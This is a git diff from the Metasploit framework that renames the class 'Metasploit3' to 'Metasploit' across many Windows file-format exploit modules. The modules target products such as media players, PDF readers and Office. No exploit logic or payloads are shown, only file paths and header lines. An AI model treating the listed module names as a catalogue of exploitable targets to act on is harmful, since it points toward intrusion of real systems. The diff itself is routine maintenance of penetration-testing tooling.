a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index 2eddd04730..e33a9dc17d 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index ead6de182e..a5b5724efa 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index fd03303457..fccc7d41b8 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index 672dd21363..4b69deec88 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb +++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 1e45c2bad9..4ebc1db003 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index f27d29a44c..78eb8ed76f 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 171aa77b96..8337a917cc 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 74c7b8f7ea..4f93d12b41 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 76ce8452b6..a7e2211515 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 3535ec9342..f8ab28c7e0 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index dde740dc05..8188fe14f0 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index ae6179ce9b..5ea67b3a48 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 1a4afb7f65..acdb91e870 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 284effe31b..8fecdab25c 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 5e22d75d04..0f70af6d48 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 48e04da124..c22c602790 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index f63cae9376..234e3d731c 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index d1d7450d78..b9add88f85 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index c455d9abe3..72f7ee963d 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index 0985e0c229..c2a05471d7 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index e13df2b8f0..9f4c550a8f 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 38686df93b..d441e2d86c 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index df64e35035..ca1b305efe 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index fd9a115fca..e349040c48 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index f5da05ca0a..28a0058b6e 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 1f9be2a724..118eabf760 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index 166a9cfee8..f3d2833bb2 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index 9be4a7dc85..eec9159bb8 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 7e82c08be2..8e9449ca95 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index e2019f38cc..39df103dfc 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 8fda60248c..638e0783e6 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 541f6ac734..5a9a7f75b5 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index b7cb7a9e32..c070335d12 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 24ae5f20f2..bf59386e3d 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index dd83c0b103..98b09221c8 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 468b74316a..b2161395c5 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb index b4ed4d9963..99009920c2 100644 --- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb +++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include REXML diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index 9040c45a16..b12e02856f 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # ASLR+DEP bypass include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index 0d4f157193..c0862e909b 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 6e76f51aff..ef022f1a11 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb index 29df9fcdd0..2c4beb765c 100644 --- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb +++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index aebb884c39..7893072efb 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb index 55699fcecf..16585dd5cd 100644 --- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb +++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb index 4bc326cf3c..322cebfa70 100644 --- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb +++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lattice_pac_bof.rb b/modules/exploits/windows/fileformat/lattice_pac_bof.rb index 7af09b6327..80a5d898af 100644 --- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb +++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index 2c46655a13..f54e929612 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index aaaa68e5e4..86d62d642c 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index a210a5ddad..cd8344449a 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 41af41ef90..a79e8761fb 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb index 9a91b041e3..58edeea6cf 100644 --- a/modules/exploits/windows/fileformat/mediacoder_m3u.rb +++ b/modules/exploits/windows/fileformat/mediacoder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e6bf891a76..bc083ea75c 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index d2b6298122..b6b7deb185 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index aaa749cc1f..4c56535829 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 45c708b636..26e72a76ac 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 06133dcc58..895bc0e722 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 95dff30b96..7146407423 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index b1d56c8738..5871055937 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb index 5565d239b8..d1ad362615 100644 --- a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 563806e43f..afd3a993ae 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 01127ad7e2..260d01b1d2 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index 3e903cfb6a..24dfc03cf6 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote 